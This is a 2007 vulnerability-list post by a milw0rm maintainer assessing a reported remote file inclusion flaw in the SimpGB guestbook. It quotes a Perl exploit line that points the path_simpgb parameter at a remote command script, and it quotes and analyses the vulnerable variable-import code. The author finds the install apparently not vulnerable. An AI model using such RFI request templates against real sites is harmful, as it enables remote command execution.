[VIM] probably true: SimpGB RFI, likely dynamic variable evaluation
str0ke
str0ke at milw0rm.com
Thu May 24 19:03:57 UTC 2007
exploit code
#######################
$req = HTTP::Request->new(GET
=>$Path.'guestbook.php?path_simpgb='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or
die "\nCould Not connect\n";
#######################
by default the config.php script doesn't initialize the no_rgcheck
variable it just has it commented out, pretty easy to bypass this if
register globals = on.
#########################
if(!$no_rgcheck)
{
$rg_ini=@ini_get('register_globals');
if($rg_ini || (strtolower($rg_ini)=='on'))
die("register_globals should be set to off for security reasons");
}
# This shouldn't overwrite path_ or url_ variables correct?
while( list($var, $param) = @each($_GET) )
{
if(!isset($$var))
{
if((substr($var,0,4)!="url_") && (substr($var,0,5)!="path_"))
{
$$var=$_GET[$var];
if(!get_magic_quotes_gpc())
$$var=addslashes($$var);
}
}
}
After installing the app it doesn't seem vulnerable. With or without
the rg check.
/str0ke
More information about the VIM
mailing list